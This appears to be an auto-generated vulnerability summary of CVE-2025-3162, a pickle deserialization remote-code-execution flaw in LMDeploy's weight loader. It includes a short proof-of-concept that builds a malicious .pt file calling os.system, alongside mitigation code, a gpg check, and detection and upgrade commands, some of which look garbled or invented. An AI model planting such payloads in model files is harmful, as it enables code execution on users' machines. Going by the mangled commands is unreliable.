Listen to this Post
How CVE-2025-3162 Works
The vulnerability exists in LMDeploy’s PT file handler component within lmdeploy/vl/model/utils.py. The `load_weight_ckpt` function improperly validates serialized data during PyTorch model weight loading. Attackers can craft malicious PT files containing arbitrary Python objects that execute during deserialization. Since the function doesn’t implement proper sandboxing or object validation, this leads to remote code execution. The local attack requirement stems from the typical deployment scenario where users load custom model weights, making social engineering a viable attack vector.
DailyCVE Form
Platform: LMDeploy
Version: <= 0.7.1
Vulnerability: Deserialization RCE
Severity: Critical
Date: 04/03/2025
What Undercode Say:
Exploit Analysis:
import torch
import pickle
class Exploit:
def <strong>reduce</strong>(self):
import os
return (os.system, ('malicious_command',))
payload = {'weights': Exploit()}
torch.save(payload, 'malicious.pt')
Protection Commands:
Verify file signatures before loading gpg --verify model.pt.sig Use in isolated container docker run --rm -v ./models:/models lmdeploy --sandbox
Mitigation Code:
Safe weight loading patch
def safe_load_weights(path):
from pickle import Unpickler
class RestrictedUnpickler(Unpickler):
def find_class(self, module, name):
if module == 'torch' and name == 'Tensor':
return super().find_class(module, name)
raise pickle.UnpicklingError(f"Global '{module}.{name}' forbidden")
with open(path, 'rb') as f:
return RestrictedUnpickler(f).load()
Analytics:
- Attack Complexity: Low (pre-crafted file)
- Privileges Required: Low (user-level)
- CVSS Vector Breakdown: AV:L/AC:L/PR:L = Local access required
- Patch Status: Not yet available
Detection:
Find vulnerable versions pip show lmdeploy | grep "Version: 0.[0-7]."
Upgrade Command:
When patched version available pip install --upgrade lmdeploy>=0.7.2
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
